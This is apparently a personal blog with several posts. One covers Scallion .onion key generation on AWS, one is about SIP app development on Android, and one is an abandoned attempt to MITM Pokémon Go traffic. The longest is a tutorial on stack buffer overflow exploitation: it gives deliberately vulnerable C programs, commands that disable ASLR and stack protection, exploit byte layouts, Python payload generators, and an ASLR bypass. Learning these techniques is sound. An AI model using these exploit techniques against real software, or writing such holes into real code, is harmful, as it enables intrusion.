Generating vanity .onion domain names using Amazon AWS GPUs

Saturday, February 16th, 2019

First, here’s a good guide on using Scallion to generate .onion keys using a GPU. Start with that if you’ve got access to the actual hardware. If you own the hardware, presumably you have the proper drivers installed, so it should be pretty easy.

But if you want to just spend a few bucks and rent an AWS GPU temporarily, you will probably have some issues following those instructions to install the Nvidia OpenCL libraries on a standard AWS Debian or Ubuntu image. Maybe you landed here because you got one of these errors:

Package nvidia-opencl-icd is a virtual package provided by:
nvidia-opencl-icd-384 384.130-0ubuntu0.16.04.1
nvidia-opencl-icd-340 340.104-0ubuntu0.16.04.1
nvidia-opencl-icd-304 304.135-0ubuntu0.16.04.2
You should explicitly select one to install.
E: Unable to locate package nvidia-opencl-common
E: Package 'nvidia-opencl-icd' has no installation candidate

Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:
The following packages have unmet dependencies:
nvidia-opencl-dev : Conflicts: opencl-dev
ocl-icd-opencl-dev : Conflicts: opencl-dev
Recommends: libpoclu-dev but it is not installable
E: Unable to correct problems, you have held broken packages.

ubuntu@...:~/scallion-v2.0$ mono scallion.exe -l
WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v4.0.30319
beignet-opencl-icd: no supported GPU found, this is probably the wrong opencl-icd package for this hardware
(If you have multiple ICDs installed and OpenCL works, you can ignore this message) Unhandled Exception:
System.InvalidOperationException: ErrorCode:'-1'
at scallion.CLDeviceInfo.CheckError (Int32 err) <0x41448340 + 0x00093> in :0
at scallion.CLDeviceInfo.GetDeviceIds (IntPtr platformId, DeviceTypeFlags deviceType) <0x41449290 + 0x00055> in :0

Figuring out dependencies sucks. Dealing with Linux drivers sucks. So instead of that, you should use an OS image where someone has already done this for you! You would think that maybe AWS would suggest this to you when using a GPU instance, since you can’t very well use it without the GPU libraries, but here we are.

Just search for “GPU” when selecting your AMI and you will be much happier than if you tried to install this stuff yourself. Install the rest of the packages mentioned in that other post (namely: $ sudo apt-get install clinfo mono-complete mono-devel beignet beignet-dev libssl-dev) and hopefully you should be good to go.

One final note: you can download binary packages from Scallion’s GitHub rather than compiling it yourself. Given that it uses .NET for some reason, skipping the Mono build also removes one step that could go wrong on Linux.

$ mono scallion.exe -l
WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v4.0.30319
Id:0 Name:Tesla M60
PreferredGroupSizeMultiple:32 ComputeUnits:16 ClockFrequency:1177
MaxConstantBufferSize:65536 MaxConstantArgs:9 MaxMemAllocSize:1997225984

$ mono scallion.exe -t4 -d 0 melon
WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v4.0.30319
Cooking up some delicions scallions…
Using kernel optimized from file kernel.cl (Optimized4)
Using work group size 32
Compiling kernel… done.
Testing SHA1 hash…
CPU SHA-1: d3486ae9136e7856bc42212385ea797094475802
GPU SHA-1: d3486ae9136e7856bc42212385ea797094475802
Looks good!
...
LoopIteration:6 HashCount:100.66MH Speed:1398.1MH/s Runtime:00:00:00 Predicted:00:00:00
Found new key! Found 1 unique keys.

2019-02-16T08:01:41.734936Z
melonqgytws2cgwh.onion
-----BEGIN RSA PRIVATE KEY-----




Real-time text development notes 3

Friday, September 9th, 2016

I’ve been meaning to write down some general impressions from my first attempt at a SIP app on Android, specifically my RTTApp. This was my first time using JAIN SIP and Android, so it was a bit rough, but I eventually got it all working reasonably well. Surely any future attempt at using either of those will go better, and the things that bothered me might not bother me so much next time, but there really were quite a few things that made this harder than I expected.

JAIN SIP

First of all, this full-featured framework was way more full-featured than I expected. It’s fairly imposing. Since I don’t have a ton of software development experience, it might not have been such a great choice to dive into this one. I wanted to make a simple client, but this library can be used for all sorts of other SIP apps, like servers and proxies. If you don’t need that, and you really just want something one step up from the useless Android APIs, you might try looking around to see if anything else will meet your needs. JAIN SIP is not easy to use the first time.

My usual method of using some new library is to look at some example code, try making a few calls, and check the documentation when I need it. In this case, that does not work. You need to know how the whole thing fits together before you get very far, and what things it does or doesn’t do for you. You need to know about its various layers. Read (really read) the lengthy documentation for SipStack, SipProvider, SipListener, and Dialog. And consider a book. There are plenty of short examples online showing how to send your first REGISTER message, but you really might want the conceptual overview and detail that an actual book could provide.

For example, while it handles some things like retransmissions (usually) under the hood for you, there are other cases where it hardly does anything for you at all. You won’t get very far if you don’t know anything about SIP. You can’t just say, “here’s a SIP address, please call it”. You need to construct all the messages yourself, and fill in most of the details, so you’d better know which headers are required on different types of requests. The Request and Response classes are basically dumb containers, and it’s up to you to know what to put in them. There’s very little hand holding in constructing these messages. You will be participating in SIP interactions and had better know what messages to expect in response, no way around it. This guy really loves SIP and wrote a number of posts that I found useful in understanding all sorts of SIP interactions.
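To make the header burden concrete: a SIP request is just structured text, and RFC 3261 requires Via, Max-Forwards, To, From (with a tag), Call-ID, and CSeq on every request. Here is a sketch of a bare REGISTER built by hand — plain Python rather than JAIN SIP, and all the names and addresses are made up:

```python
# Build a bare REGISTER request by hand to show which headers SIP requires
# on every request (RFC 3261 section 8.1.1). All names and addresses here
# are hypothetical.
def build_register(user, domain, branch, tag, call_id, cseq=1):
    lines = [
        "REGISTER sip:%s SIP/2.0" % domain,
        # Via carries the sender's address plus a unique branch parameter
        "Via: SIP/2.0/UDP client.example.net;branch=z9hG4bK%s" % branch,
        "Max-Forwards: 70",
        "To: <sip:%s@%s>" % (user, domain),
        # From must carry a tag; you supply it, the library won't invent one
        "From: <sip:%s@%s>;tag=%s" % (user, domain, tag),
        "Call-ID: %s" % call_id,
        "CSeq: %d REGISTER" % cseq,
        "Content-Length: 0",
    ]
    return "\r\n".join(lines) + "\r\n\r\n"
```

With JAIN SIP you assemble the same message through AddressFactory, HeaderFactory, and MessageFactory calls, but knowing which headers to create is still entirely on you.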

When sending those messages, you need to be careful about how you handle client and server transactions created by the SIP stack. Sometimes you have to request a new transaction from it that you use immediately. Sometimes it seems to know what to do and has a transaction for you. Sometimes a RequestEvent has an existing transaction that you need to use to respond. But sometimes you need to hang on to a transaction you created yourself, and use that one specifically for a certain message. This all felt like a real mess to me, but maybe I just don’t understand SIP well enough. Then again, JAIN SIP’s notion of transactions is apparently not the same as in the actual SIP standard, or is that dialogs? To be honest I’m still no expert. This probably sounds stupid to more experienced JAIN SIP users, but that’s kind of my point; trying to use this framework for the first time makes you feel stupid, and then you start to ask if maybe the people who wrote it were the stupid ones, and I still don’t really know.

When you receive a message, it’s up to you to know the context for it. Is it a response to a request you sent? Is it for someone else entirely? Is it just some garbage that’s floating around the internet? The SIP stack takes very little responsibility for correlating related messages and responses. My app doesn’t actually do enough of this, but I now know that you should probably keep some kind of data structure with the messages you’ve sent and received so you can relate future ones to them, and also have existing transactions and dialogs available if you need them. For all the complexity of the various layers of the SIP stack, it seems like it doesn’t keep track of that much for you. You have to keep track of some of its own state yourself, e.g. the state of transactions and dialogs, if you really want to be thorough and careful.

Issues with JAIN SIP on Android

One issue I had in trying to write a SIP app on Android was with logging. When writing logic to handle incoming SIP messages, I wanted to see what messages were received, so I tried to write them to the log, but basically none of them were showing up. This turned out to be entirely Android’s problem and had nothing to do with JAIN SIP: it was caused by trying to log large SIP messages. SIP requests can be pretty long compared to the stuff one normally writes in a log, and Android refuses to handle this. The Log class silently eats any message it deems “too long” (seems to be around 100 chars?), and there is no way to know this has happened. Indeed, there is no way for a new developer to know this can happen, because it is not documented. However well-intentioned the functionality is, doing it silently and secretly is colossally stupid and rude, which is typical of Android, but more on that later.
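The workaround I ended up with is dumb but effective: split the message yourself and log each piece. The splitting is just a slice loop — sketched here in Python for brevity; the Java version wrapping android.util.Log.d is the same loop. The 100-char threshold is only what I observed, so treat it as a tunable guess:

```python
def log_chunks(msg, limit=100):
    """Split a long message into pieces short enough for Android's Log.

    The ~100-char default is only an observed guess; the real limit is
    undocumented, so tune `limit` to whatever your device tolerates.
    """
    return [msg[i:i + limit] for i in range(0, len(msg), limit)]
```

Each returned chunk then gets its own Log.d() call, so nothing silently disappears.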

Speaking of logs, JAIN SIP wants to use Log4j to handle its own logging, which I gather is common enough on desktop Java apps but unnecessary on Android. Since Log4j is not normally present, including the JAIN SIP jar will cause your Android build to fail right off the bat. You need to include the log4j.jar in your libs directory, even if you don’t plan on using it. Alternatively, I suppose you could modify JAIN SIP from source to exclude this and recompile it yourself, but that sounds a lot harder than simply including this other jar in what will probably be a multi-MB app anyway.

After managing to receive SIP messages, I encountered another Android hiccup when trying to send some. ClientTransaction.sendRequest(), for example, will fail with a NetworkOnMainThreadException. This is an effort to make the UI thread smoother by preventing people from trying to wait on TCP sessions, and the solution is to do network stuff in an AsyncTask subclass. This is not something you will see in any JAIN SIP example code, since they all assume that Java desktop apps can handle the network however they like.

Doing some network stuff in a background thread is probably a good idea, so I appreciate the strong suggestion on the part of Android, but in this case I’m not sure how much sense it makes. I did use a number of AsyncTasks for sending my various kinds of messages, but it really created a lot of hassle in JAIN SIP. AsyncTask is kind of a pain generally, since it has a really general API that has to work for any kind of data you are passing in and returning. When sending UDP messages, as one generally does in real-time apps, this may not be necessary. You can disable this strict thread policy, but if you do, you’ll need to be careful that your app isn’t doing any other TCP stuff on the main thread that you didn’t consider. Note that the StrictMode.ThreadPolicy documentation is wrong, and LAX is not the default.

Wrong docs, eh? That brings us to…

Other Android Gripes

Warning: this section is basically complaining.

The first thing to say about Android specifically is that it can’t do much in the way of real-time SIP stuff except for really basic audio calls. Hence, the need for JAIN SIP. It’s too bad, though. Android’s APIs make it straightforward to establish audio calls, so why not any other type of call? Did they really never think that phones would be used for something besides, you know, talking on the phone? If they are going to offer this interface at all, it would really be best if they would put some effort into beefing up this functionality to make a more approachable interface than JAIN SIP. I would understand if this were the first version of this API, but it’s been like this for over 5 years. I guess they’re too busy with ugly watches and ways to make you crash your car ::eyeroll::

But this also gets to a larger problem with Android. This simple API doesn’t do much, but the ones that do are complex. To be sure, that is a feature of APIs in general: the more you do, the more complex it is. But to me — and yes I’m still fairly new at this — Android just seems pretty bad. It’s a little hard for me to judge that, not having used a system this big before, so I tried to see if other people feel the same way. These people sure do, so I don’t feel quite so dumb now. It doesn’t help that the official tutorials I’ve been using are well out of date and in some cases not even correct at the time they were written (like, syntax errors, seriously). It’s changing so fast that there’s all this crap in there from “old” ways of doing things a couple years ago, and nothing is removed yet, and it’s hard to know if there is a good reason to use the “new” way or not. Sometimes the docs say some new way is preferred, but not why, or when. (And of course a lot of them are wrong or incomplete. I appreciate that writing and updating really good docs is hard, but you’d think one of the most successful software companies in the world could handle this)

They’re adding all this complexity, but not hiding some where they should. Take the SQLiteDatabase. The API here looks like it probably comes straight from the database. There’s a cursor you have to move once a query is returned. Why? Is that really necessary for most Android uses? Some database concepts don’t make sense when you’re dealing with a simple little thing most often used in simple little ways in simple little apps. Is it too much to ask to get an actual data structure back from a query, rather than mucking around with the cursor?

Another example: Cursor.getString() requires you to know the column number you queried, which you have to get from another method by looking up the column index for the column name. Why does this workflow even exist? What possible use could a smartphone developer ever have for the column number directly, when they could be querying by name? Saving this one line in the API could probably save millions of lines across all the apps in the world, and would take about 15 seconds to implement at Google. And, oh yeah, get this fuckery: the documentation says that some behavior is implementation-defined. Excuse me? Is there another implementation of Android that I’m not aware of? Maybe it’s dependent on the implementation of SQLite, but, um, I don’t recall personally selecting which implementation is used on every single Android device. Perhaps that was done by Google, who wrote this doc?

Why have they preserved this useless database interface, which many apps will need, but added their cut-down toy API on top of SIP, which is much more niche?

(Not really) Reverse Engineering Pokémon Go

Wednesday, August 17th, 2016

I have enjoyed playing Pokémon Go. So have tens of millions of other people, so many that the developer Niantic was completely unprepared to handle this level of interest at first. While they had their hands full, I thought it would be fun to try to reverse engineer their protocol and try to mess with the app. Practical applications of this include finding the exact location of nearby Pokémon, reporting security bugs, and of course cheating. It would definitely be fun to find any glaring security holes that were now suddenly affecting a huge number of people.

Eventually I gave up on this after Niantic caught up to the reverse engineers and made it more difficult to decrypt the traffic. This is probably a losing battle for Niantic, but it sufficiently discouraged casual tinkerers like me. The more dedicated ones are still working over at /r/PokemonGoDev. Since I spent some time on it, I figured I’d write up what I learned from the experience. Learn from failure, and all that.

Aside: don’t use Windows

This is neither here nor there, since people already have plenty of preferences about OSes, but it ended up getting in my way in this case. You certainly can do anything on Windows that you can on any other computer. But when you’re trying to do anything UNIXy, like talk to an Android device over adb, Windows isn’t going to help. I even went so far as to install a Windows version of bash to try to improve the shell experience on the work laptop from my summer job that I used for this project, but that didn’t really help. Maybe Microsoft’s own upcoming port of the core Linux utilities will be better, or maybe I’m just not good enough at computers to immediately get the hang of this version. Whatever.

Don’t touch any variant of Android on an x86 host

Initially I wanted to do all my experiments on a PC, since it’s easier to mess around on a “real” computer than on a physical Android device. Even with root, you have to jump through more hoops, and there are more tools available on a PC. I figured cleartext packet captures might be easier to come by if the source was a VM on my laptop. This is wrong, but never mind, here’s what I tried:

  1. Standard x86 build of Android installed by me in a Virtualbox VM
  2. Standard x86 build of Android in someone else’s pre-made VM
  3. Genymotion Android VM on a Windows host
  4. Bluestacks Android ARM emulator on a Windows host
  5. Bluestacks Android ARM emulator on a Windows guest VM

Only the last one of these allowed me to successfully run Pokémon Go and isolate the traffic from it, and then only briefly. This entire class of activity is too niche to be supported well. Just use a real device.

I would leave it there and move on, but in the interest of getting some kind of value from the time I wasted on these attempts, I’ll write down some of the problems I encountered.

x86-native Android in a VM

This would seem to be the most promising way to run Android on a PC, because it’s the fastest. Unfortunately basically no one actually uses Android on PC hardware for anything, so not a lot of people have an interest in making this work. There’s no worldwide network of Cyanogenmod devs who have the same needs as you with your exact device. There’s a project, and you can find people talking about it on xda-developers, but it’s not exactly mainstream.

The basic experience of running an x86 Android build in a VM is actually not bad — it supports the mouse and keyboard and all that no problem. But neither of the versions I tried actually worked when it came to the most important thing: installing Pokémon Go from the Google Play store. The Play app did not say that my device was not supported, which was nice, since indeed the newer builds (since 29.2) are supposed to support x86 devices like the Asus Zenfone. But installation failed, and checking the provided link in the error message was no help. That generic error page actually had a note added to it recently that specifically mentioned that the Play Store could not help with Pokémon Go problems. Ha.

Perhaps we can sideload the apk? I got a copy off my ARM device, which failed to run on the x86 VM. Checking the logcat, the app was looking for some ARM libraries that clearly would not work here. I tried a copy of the app from apkmirror (of course I wouldn’t do this on my real device), which said that it should now support x86, but the same problem appeared. Some people online suggest installing an ARM compatibility layer for your x86 Android device; no luck.

So, Android on x86 exists, but that’s about all I can say about it.

Commercial VMs/Emulators

The most promising prepackaged commercial solution seemed to be Genymotion, which is free for personal use and can automatically download appropriate ROMs for your preferred Android version. It is also an x86 VM, but this is not entirely obvious at first, because the virtual devices it creates make themselves out to be “phones”. To make a long story short, some of the same problems occurred here. In fact, it was worse, since the Play Store said off the bat that the device is not compatible with Pokémon Go. Since Genymotion is targeted at gamers, other people have tried sideloading it as well, and again people online suggested a Genymotion ARM Translator layer, which can be downloaded from some sketchy site. I’m not particularly attached to any of the data in this brand new VM, so I tried it, but again no luck.

I downloaded another commercial Android VM/emulator(?) AndyRoid, but 16 scanners on VT think this is malware. Hmm. It’s a downloader, clearly, so maybe a false alarm, but let’s go ahead and pass on that one.

Next up: an actual ARM emulator, Bluestacks. This one is also targeted at games, and Pokémon Go is even on their homepage, so this seemed promising. Indeed, it installs and launches OK. Progress!

Unfortunately, this simplified game platform thing has a few drawbacks. For one, being an emulator, it’s slow. Oh well. But more problematically, since it uses a highly modified custom ROM, some settings aren’t available in the normal place. Like, say, developer options, network settings, and the ability to even view your own IP address. There’s no file manager. The interface is clunky. I think I had to do something special to get adb working (I’ve tried to forget some of this). All around this is a pain.

The first unworkable problem to crop up with this emulator is that it is hard to isolate the traffic from it in Wireshark. It is a regular desktop app like any other, so it uses the same network interface as everything else. What would be better would be to have a virtual interface set up for it that we can isolate. So, I installed it in a Windows VM (on a Windows host, this is so silly). This nested virtualization started to get annoying, but worked.

With Bluestacks, you can access the full Play Store to get access to things like GPS spoofing apps, and an opaque rooting binary. Who knows what that thing does. But again, I didn’t have any real data exposed, so who cares (I took the calculated risk that this platform is obscure enough that these apps would not contain specific VM escape exploits for it, and it was within another VM anyway).

I followed a series of extremely sketchy instructions from Bluestacks themselves on how to spoof GPS in a way the app wouldn’t detect, and everything was just barely working. I left for the day, and when I came back the next…it didn’t work anymore. Honestly I don’t even remember what the exact problem was. Something had borked the entire Bluestacks environment. Screw this.

Use a real device

Seriously, just do this. You can’t capture the traffic in Wireshark as easily, but actually you don’t want to anyway. My initial Wireshark experiment with the layered VMs indicated that the interesting traffic appeared to be encrypted with TLS (as you would hope). To strip this off, you could try to recover the keys from the device’s memory, or something, but the best way is to MITM the connection with your own proxy.

You could try setting this up yourself with something like sslsniff, if you know what you’re doing when it comes to certificates and ARP spoofing and so forth (you know the difference between layer 2 and layer 3, right?). Moxie’s instructions are pretty good. An even friendlier option, and ultimately a more useful one, is mitmproxy, which is extremely easy to set up and is especially handy for parsing the intercepted HTTP traffic in real time. This tool automates the process of installing its own root cert on the device. Then you can watch the requests and responses flow by and have it parse the json/xml/protobuf for you. There’s a Python library to work with the packet capture format it uses. I had no problem getting decrypted traffic from Pokémon Go v29.2 when routing my device’s traffic through this proxy.
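mitmproxy can also run your own script against every intercepted flow, which is handy once you want to do more than watch the traffic scroll by. A rough sketch of such a script — the exact hook signature varies between mitmproxy versions, so treat this as illustrative rather than exact:

```python
# Sketch of a mitmproxy script hook: log each intercepted request and the
# size of its response as flows pass through the proxy. In modern mitmproxy
# this function is loaded as an addon; older versions used a different
# (context, flow) signature.
def response(flow):
    req = flow.request
    print("%s %s -> %d bytes" % (
        req.method, req.pretty_url, len(flow.response.content)))
```

From here it is a small step to dumping the raw bodies to disk for offline protobuf poking.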

Now then, let’s talk about what’s in there. I expected it to be something reasonably straightforward like json, which mitmproxy and any number of other tools/libraries have no trouble parsing. Nope, it uses protocol buffers, a library to make compact binary protocols easier to use on the developer end. Decoding the structure of protobuf data is easy enough, but unfortunately if you didn’t write the protocol, you have no idea what any of it means. As my networking professor put it, binary protocols are more efficient, but text protocols are more useful for humans who have to program them. Protobuf makes binary easier for developers, but not really for reverse engineers who don’t have the protocol definition.
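Decoding the structure without a .proto file is mechanical — every field is a varint tag encoding a field number and wire type, followed by a payload whose length the wire type determines. This is essentially what `protoc --decode_raw` does; a minimal sketch of that walk:

```python
def read_varint(data, i):
    """Read a base-128 varint starting at index i; return (value, next_index)."""
    shift = value = 0
    while True:
        b = data[i]
        i += 1
        value |= (b & 0x7F) << shift
        if not (b & 0x80):
            return value, i
        shift += 7

def decode_raw(data):
    """List (field_number, wire_type, payload) triples from a protobuf blob,
    with no knowledge of what any field means."""
    i, fields = 0, []
    while i < len(data):
        tag, i = read_varint(data, i)
        field, wire = tag >> 3, tag & 0x07
        if wire == 0:                       # varint
            val, i = read_varint(data, i)
        elif wire == 2:                     # length-delimited: bytes/string/submessage
            n, i = read_varint(data, i)
            val, i = data[i:i + n], i + n
        elif wire == 5:                     # fixed 32-bit
            val, i = data[i:i + 4], i + 4
        elif wire == 1:                     # fixed 64-bit
            val, i = data[i:i + 8], i + 8
        else:
            raise ValueError("unsupported wire type %d" % wire)
        fields.append((field, wire, val))
    return fields
```

For example, `decode_raw(b"\x08\x96\x01")` yields `[(1, 0, 150)]` — field 1, a varint, value 150. That tells you the shape of the message, but nothing about whether field 1 is a latitude, a timestamp, or a Pidgey.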

The smart people at /r/PokemonGoDev have made pretty good progress on reversing some of what’s in there and have some .proto files available to help third-party programmers parse it. They aren’t complete, though, and you’ll need some experience with protobuf to really get a handle on this. Rather than figuring the rest out yourself, here’s someone who has already made a lot of progress on this task. Looks handy! Even better, here is a whole MITM toolkit ready to go, apparently. OK sweet.

Cryptography!

Just as I found all of these tools, a wrinkle appeared. Version 31.0 of the app uses certificate pinning, and believe it or not, the certificate/keys generated by mitmproxy are not the ones the app expects. This is general good security practice, but in this case it was probably added specifically to stop the kind of thing we are doing. Niantic is not happy about all the mapping apps and bots that have sprung up.

This guide has a nice walkthrough of ways to patch the binary to remove the cert check. That’s a fun example of how to patch binaries in general to disable certain behaviors (like checking serial numbers…not that anyone should ever do such a thing). One issue that arises here is that Google login will no longer work, since the apk will not be signed properly, and you will have to use a Pokémon Trainer Club account.

I tried one of the suggested patch methods, but it did not immediately work, and I lost patience. Niantic wants to shut us out from reading and injecting traffic, and I don’t blame them! Part of my goal here was to figure out how hard such a thing would be. It’s clearly not impossible, but they are trying to make it harder. I don’t have the time to try to keep up in this escalating battle. When it comes to bots, honestly I hope Niantic wins this arms race. The bot writers don’t think they will. Whatever happens, those of us casually poking around will have our work cut out for us. After this many hurdles, I’m calling it quits and am going back to just enjoying playing the game like a normal person.

Smashing the stack, mainly for fun and no profit

Thursday, July 21st, 2016

The basics

Stack buffer overflows are one of the most common types of security vulnerability. Mudge and Elias Levy/Aleph One published papers 20 years ago about how to exploit them and gain code execution (i.e. redirect program flow to your own code). This is now harder, but the basic problem of lack of memory safety in C and its descendants is still with us. I’ve been learning the basics of writing stack buffer overflow exploits and how to get around some of the modern defenses against them. This is a distillation of my notes to myself, which breaks no new ground, but may as well be on the internet in case it helps someone else.

My writeup here assumes basic familiarity with C, x86 assembly, and gdb. Unfortunately, you’ll definitely need the first two if you want to get started with this kind of exploitation in general. This was all done on Ubuntu 12.04 32-bit with gcc 4.6.3, though it should all be pretty similar on another 32-bit Ubuntu install.

A good place to start for an even simpler demo than Mudge’s paper is this Computerphile video. That will show you the basics of how to use gdb to find what you need to exploit this simple program:

#include <string.h>

#define BUFSIZE 500
int main(int argc, char **argv) {
    char buf[BUFSIZE];
    strcpy(buf, argv[1]);
    return 0;
}

The basic principle is that we are going to overwrite the saved %eip on the stack, so when main() returns, it jumps to the address we want, which will contain the code we want to execute. In this basic formulation, we will write both our shellcode and the address to execute all in one step. We will exploit this program by feeding all this data in as the argument, which strcpy helpfully writes to the stack for us.

In order for this simple technique to work, we need to disable three protections against stack buffer overflows: ASLR, the stack canary, and the non-executable stack. More details follow later, but the main things to do are this:

$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ gcc buf_overflow.c -o buf_overflow.out -g -z execstack -fno-stack-protector

The first command tells the kernel to disable ASLR when loading programs. When building with gcc, the -z flag tells the linker to mark the stack pages as executable, which they normally aren’t, and -fno-stack-protector omits the canary checking code.

As an aside, you will probably want to enable core dumps so you can examine the state of the process when it crashes if your exploit is not quite right:

$ ulimit -c unlimited

Here’s main()’s stack frame:

0xFFFFFFFF
...
------------------------
| char ** argv         | <-- %ebp + 12
------------------------
| int argc             | <-- %ebp + 8
------------------------
| saved %eip           |
------------------------
| saved %ebp           | <-- %ebp
------------------------
| ...                  |
| buf                  | <-- %ebp - 500 = %esp
------------------------
...
0x08040000

Our exploit will be written in to buf, starting at the low address and going up from there. We need to precisely position all our malicious bytes so that the return address exactly lines up with the saved %eip, and that address points to the part of the stack where our shellcode is. The exact location of &buf may not quite be %esp or %ebp - 500; the compiler is free to put other local variables on the stack and arrange things however it likes, and it has to align some variables to 4-byte word boundaries. This is why you have to play around in gdb to examine the stack and find the exact addresses you need.

A basic exploit technique that slightly loosens the requirements for precise addresses is the nop sled. Putting a huge chunk of nop instructions (technically “xchg eax, eax”, opcode 0x90) in front of the shellcode means you can jump anywhere in that region and execution will proceed to the beginning of the actual code. Our exploit will look roughly like this:

--------------------------------------------------------------
| 0x90 x ~475 | ~25b shellcode | new %ebp ptr | new %eip ptr |
--------------------------------------------------------------

Replacing the saved %ebp with a real value may not be necessary, depending on the shellcode you are using. If you are really hardcore, you can write some yourself, but you probably won’t be l337 enough to run execve(“/bin/sh”) in 23 bytes, so you might want to use this one. In this case, you don’t need to set %ebp, but you may need to set %esp, since the shellcode uses that register, and returning from main() may set it to a place you don’t want. Perhaps you can find some other shellcode that doesn’t have this problem, or you can add an instruction to set %esp somewhere safe. In gdb, I found that 0xBFFFF310 was a good spot, since that’s where %esp was set for main().

mov $0xBFFFF310, %esp

This assembles to 0xBC 0x10 0xF3 0xFF 0xBF (remember, x86 is little endian, so don’t get your hex bytes backwards within a word). Again, if you can write assembly, maybe you can do this without hardcoding the address. We do have to hardcode the return address, though. Since we have the %esp address from main() here, we should be able to jump into the middle of the nop sled above there, let’s say 0xBFFFF410. So here is the exploit:

--------------------------------------------------------------------------
| 0x90 x 480 | 0xBC 0xBFFFF310 | 23b shellcode | 0x90909090 | 0xBFFFF410 |
--------------------------------------------------------------------------

You can generate that input with Python, as in the Computerphile video, or write it out in a hex editor. Running it should open a new shell, rather than returning you to the one you came from.
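For example, here is a sketch in Python of generating that file. The sled size, both addresses, and the placeholder shellcode bytes are from this particular gdb session and would have to be adjusted for your own stack layout; the real 23-byte shellcode is the one linked above.

```python
import struct

# Sketch of the exploit file above. The 480-byte sled, the two stack
# addresses, and the 23-byte length all came from one particular gdb
# session; yours will differ. SHELLCODE is a placeholder -- substitute
# the real 23-byte execve("/bin/sh") shellcode.
SHELLCODE = b"\x90" * 23

payload  = b"\x90" * 480                            # nop sled
payload += b"\xbc" + struct.pack("<I", 0xBFFFF310)  # mov $0xBFFFF310,%esp
payload += SHELLCODE
payload += struct.pack("<I", 0x90909090)            # saved %ebp slot (filler)
payload += struct.pack("<I", 0xBFFFF410)            # saved %eip: into the sled

with open("exploit_input", "wb") as f:
    f.write(payload)
```

Feeding the resulting file to the vulnerable program positions the fake return address over the saved %eip.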


A more realistic example

We can use almost the same exploit for a slightly more complicated program:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define BUFSIZE 500
void read_file(int fd, char *buf, size_t bufsize) {
    size_t r;
    do {
        r = read(fd, buf, bufsize); // bad: must decrement bufsize
        buf += r;
    } while (r > 0);
}
int main(int argc, char **argv) {
    char buf[BUFSIZE];
    int fd;
    if (argc != 2) {
        printf("Usage: buf_overflow_file filename");
        exit(1);
    }
    fd = open(argv[1], O_RDONLY);
    read_file(fd, buf, BUFSIZE);
    printf("The file says: \n\n%s\n", buf);
    return 0;
}

This program takes a filename argument, reads the file into a buffer, and prints it. But it does the buffer length check incorrectly in read_file(), so we can overflow the buffer in main()’s stack frame, even though the read occurs in a different function. Nothing is substantially different in this version of the exploit, except slightly different addresses and stack placement, since there is an extra stack variable in main()’s frame.

--------------------------------------------------------------------------
| 0x90 x 484 | 0xBC 0xBFFFF110 | 23b shellcode | 0x90909090 | 0xBFFFF200 |
--------------------------------------------------------------------------

Basic defense: ASLR

These simplified techniques don’t actually work on a modern Linux system. Any combination of ASLR, a non-executable stack, and a stack canary would defeat the simple version. In isolation, though, we can still get around some of those protections. First, we re-enable ASLR.

$ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

If the location of the stack is randomized on each execution, hardcoded stack addresses won’t be any good. Instead, we need to write our shellcode in a place we can get to reliably every time, and somehow transfer execution there. A good place is %esp, since its location is easy to predict. At the time the exploit is written to the stack, %esp points below the write location, but when the vulnerable function returns, %esp will point above that stack frame. Directly above, in fact, immediately next to the return address. So we can rearrange the exploit like this:

-----------------------------------------------------------
| 0x90 x ~500 | 0x90909090 | exploit %eip | 23b shellcode |
-----------------------------------------------------------

Now we know that %esp will point at the shellcode when main() returns, but we need to transfer execution to %esp. So we need to execute:

jmp *%esp

The encoding for this is the byte pair 0xFF 0xE4, which reads as 0xE4FF when interpreted as a little-endian 16-bit value. Since we control the compilation of this vulnerable program, we could add a new function:

void jmp_esp() {
    __asm__("jmp *%esp");
}

But that’s not very realistic. This is not an instruction that is likely to occur in a real program. But we don’t actually need "jmp %esp", all we really need is 0xE4FF. This 2-byte value is much more likely to occur in a large executable somewhere, not even necessarily in the .text section. The processor doesn’t care whether 0xE4FF is supposed to mean “jmp %esp” or the decimal number 58623 or any other interpretation of bits — as long as %eip points to some location storing 0xE4FF, the processor will jump to %esp.
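You can sanity-check that byte order with a quick Python snippet; struct here just mimics what the CPU reads from memory:

```python
import struct

# A 16-bit 0xE4FF stored little-endian is the byte pair ff e4,
# i.e. exactly the encoding of "jmp %esp".
print(struct.pack("<H", 0xE4FF).hex())  # ffe4
print(0xE4FF)                           # 58623
```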

So let’s just add this simpler bit of code to our executable:

int jmp_esp = 0xE4FF;

Now that we know this 2-byte sequence will occur in the binary, we can return to its static location and transfer execution to our shellcode. Find the location in the binary:

$ objdump -D buf_overflow_aslr.out | grep 'ff e4'
    8048467: ff e4 jmp *%esp

As far as the disassembler is concerned, that code must be an instruction, which is what we’re going for, even though the value is in the .data section.

So here’s the new exploit file to bypass ASLR:

---------------------------------------------------------
| 0x90 x ~500 | 0x90909090 | 0x08048467 | 23b shellcode |
---------------------------------------------------------

Don’t forget, the little endian CPU needs to read your 0x8048467 address as 0x67 0x84 0x04 0x08. And as always, you’ll need to tune the size of the (unused) nop sled to properly position the return address and shellcode, depending on exactly how the compiler sets up the stack frame.
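Generating this file looks much like before, except the shellcode now trails the return address. Again a Python sketch: 0x08048467 and the placeholder shellcode are specific to this binary and session.

```python
import struct

# Sketch of the ASLR-bypass exploit file. The shellcode goes *after* the
# return address, because that is where %esp points once main() returns.
# 0x08048467 is where objdump found the ff e4 bytes in this binary;
# SHELLCODE is a placeholder for the real 23 bytes.
SHELLCODE = b"\x90" * 23

payload  = b"\x90" * 500                  # unused sled / padding
payload += struct.pack("<I", 0x90909090)  # saved %ebp slot
payload += struct.pack("<I", 0x08048467)  # return into the ff e4 "instruction"
payload += SHELLCODE                      # %esp lands here after ret

with open("exploit_aslr", "wb") as f:
    f.write(payload)
```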


Another defense: non-executable stack

This ASLR bypass relies on the stack pages being marked executable by the linker flag “-z execstack”. If the executable has been built without that flag, as it should be, you will get a segfault when trying to execute instructions at stack addresses. We can also get around this protection on its own, by executing existing code somewhere else. Functions in the C standard library (libc) are a popular choice, especially if the system() function has been linked in to the binary. system() runs its argument in a shell, which lets you run basically anything you want.

